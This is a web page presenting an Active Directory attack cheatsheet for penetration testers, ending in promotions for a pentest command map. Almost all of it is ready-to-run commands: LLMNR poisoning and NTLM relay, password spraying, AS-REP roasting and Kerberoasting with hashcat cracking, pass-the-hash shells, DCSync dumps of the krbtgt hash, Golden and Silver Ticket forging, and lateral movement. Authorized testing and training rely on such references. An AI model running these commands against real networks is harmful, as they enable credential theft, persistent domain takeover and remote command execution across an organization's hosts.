Active Directory Cheatsheet 2026

The complete Active Directory attack reference — from unauthenticated enumeration to Domain Admin. Kerberoasting, NTLM relay, Pass-the-Hash, DCSync, Golden Ticket, BloodHound and lateral movement.

Last updated:

New to pentesting? Read our complete beginner's guide to see where Active Directory attacks fit in the methodology.

Quick Navigation

01 Enumeration 02 BloodHound 03 LLMNR / NTLM Relay 04 Password Spraying 05 AS-REP Roasting 06 Kerberoasting 07 Pass-the-Hash 08 DCSync 09 Golden / Silver Ticket 10 Lateral Movement

# Domain Enumeration

Map the domain before attacking. NetExec (formerly CrackMapExec) and Impacket are the workhorses. Start unauthenticated, then repeat with each credential you gather.

nxc smb 10.10.10.0/24
Sweep the subnet — identify hosts, domain name, SMB signing status
enum4linux-ng -A DC_IP
Full unauthenticated enumeration: users, shares, groups, password policy
nxc smb DC_IP -u '' -p '' --users
Null session user enumeration
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Enumerate all domain users via LDAP
nxc smb DC_IP -u user -p pass --shares
List readable/writable shares with valid creds
nxc smb DC_IP -u user -p pass --pass-pol
Dump the password policy (lockout threshold before spraying)
GetADUsers.py -all domain/user:pass -dc-ip DC_IP
Impacket — dump all users with last logon and creation date

# BloodHound — Map Paths to DA

BloodHound graphs the shortest attack path to Domain Admin. Collect the data, then let the graph plan your chain.

bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
Python collector — no need to run anything on the target
nxc ldap DC_IP -u user -p pass --bloodhound --collection-method all
Collect BloodHound data straight from NetExec
.\SharpHound.exe -c All
Windows collector run from a domain-joined foothold
💡 Tip: After importing, run the built-in query “Shortest Paths to Domain Admins” and mark owned nodes as Owned to reveal chains you can already walk.

# LLMNR/NBT-NS Poisoning & NTLM Relay

With no credentials at all, poison name resolution to capture NetNTLM hashes — then crack or relay them.

responder -I eth0 -wv
Poison LLMNR/NBT-NS/MDNS and capture NetNTLMv2 hashes
hashcat -m 5600 hashes.txt rockyou.txt
Crack captured NetNTLMv2 hashes offline
ntlmrelayx.py -tf targets.txt -smb2support
Relay captured auth to hosts without SMB signing
ntlmrelayx.py -t ldap://DC_IP --escalate-user user
Relay to LDAP to grant your user DCSync rights

# Password Spraying

Try one common password against every user — stay under the lockout threshold you dumped from the policy.

nxc smb DC_IP -u users.txt -p 'Season2026!' --continue-on-success
Spray a single password across all users
kerbrute passwordspray -d domain.local users.txt 'Welcome1'
Kerberos-based spray (quieter, no SMB lockout logs on some setups)
nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce
Pair user[i] with password[i] (credential stuffing)
⚠️ Warning: Always check --pass-pol first. Locking out accounts is noisy and disruptive — never spray blindly.

# AS-REP Roasting

Accounts with “Do not require Kerberos pre-authentication” let you request an AS-REP and crack it offline — sometimes without any credentials.

GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
Find AS-REP roastable users without credentials
GetNPUsers.py domain/user:pass -request -dc-ip DC_IP
Authenticated — dump all AS-REP hashes in the domain
hashcat -m 18200 asrep.txt rockyou.txt
Crack AS-REP hashes offline

# Kerberoasting

Any authenticated user can request TGS tickets for SPN accounts. Service account passwords are often weak — crack them to escalate.

GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
Request TGS tickets for all SPN accounts (Impacket)
nxc ldap DC_IP -u user -p pass --kerberoasting kerb.txt
Kerberoast directly from NetExec
hashcat -m 13100 kerb.txt rockyou.txt
Crack the TGS hashes offline
💡 Tip: Target high-value SPNs first — service accounts that are members of privileged groups give the biggest jump.

# Pass-the-Hash

Authenticate with an NTLM hash instead of a password — no cracking required. The backbone of AD lateral movement.

nxc smb TARGET -u Administrator -H aad3b435b51404ee:HASH
Validate the hash across hosts — look for Pwn3d!
evil-winrm -i TARGET -u Administrator -H HASH
Get an interactive PowerShell shell with the hash
psexec.py -hashes :HASH Administrator@TARGET
SYSTEM shell via Impacket PsExec using the hash
secretsdump.py -hashes :HASH Administrator@TARGET
Dump local SAM + LSA secrets from the target

# DCSync

With replication rights, ask a Domain Controller for any account's hash — including krbtgt, the key to Golden Tickets.

secretsdump.py domain/user:pass@DC_IP
Remote DCSync — dump all domain hashes
secretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgt
Dump only the krbtgt hash (for Golden Ticket)
nxc smb DC_IP -u user -p pass --ntds
Dump the NTDS.dit database via NetExec

# Golden & Silver Tickets

Forge Kerberos tickets for total, persistent control. Golden = forged TGT (krbtgt hash). Silver = forged TGS for one service (service account hash).

ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administrator
Forge a Golden Ticket impersonating Administrator
export KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DC
Use the forged ticket to get a SYSTEM shell
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator
Forge a Silver Ticket for a specific service (stealthier — no DC contact)

# Lateral Movement & Shells

Move between hosts with the credentials and tickets you've collected.

ToolAccessNotes
psexec.pySYSTEMNoisy, creates a service — most detected
wmiexec.pyUserSemi-interactive, no service (quieter)
smbexec.pySYSTEMNo file dropped to disk
evil-winrmUserFull PowerShell — needs WinRM (5985)
atexec.pySYSTEMRuns via scheduled task
wmiexec.py domain/user:pass@TARGET
Quiet semi-interactive shell over WMI
evil-winrm -i TARGET -u user -p pass
Interactive PowerShell over WinRM
nxc smb TARGETS.txt -u user -p pass -x "whoami"
Run a command across many hosts at once

❓ Active Directory Pentest FAQ

Enumeration. Unauthenticated, run responder to capture hashes and enum4linux-ng/nxc against the domain. Once you have any valid creds, collect the attack surface with BloodHound to map paths to Domain Admin.

Requesting Kerberos TGS tickets for accounts with an SPN. The ticket is encrypted with the service account's hash, which you crack offline with hashcat -m 13100. Any domain user can request them — a classic low-to-high privilege attack.

Kerberoasting targets SPN accounts and cracks the TGS (-m 13100). AS-REP roasting targets accounts without Kerberos pre-auth and cracks the AS-REP (-m 18200) — and can work with no credentials if you know a valid username.

Authenticating with an NTLM hash instead of a plaintext password. Tools like nxc, evil-winrm and Impacket accept -H to use the hash directly — no cracking needed.

Abusing Directory Replication to ask a DC for any account's hash — including krbtgt and Domain Admins. It needs replication rights; secretsdump.py performs it remotely.

A forged TGT signed with the krbtgt hash. Since krbtgt signs every ticket, owning its hash lets you impersonate anyone (incl. Domain Admin) indefinitely — the ultimate persistence. Get the krbtgt hash via DCSync first.

It graphs the shortest paths to Domain Admin from AD data (users, groups, sessions, ACLs). Collect with SharpHound or bloodhound-python, then run “Shortest Path to Domain Admins”.

NetExec (ex-CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm and hashcat. Most ship with Kali Linux.

📚 Related Resources

AI-Assisted Pentest Report

Turn your AD compromise into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This AD cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →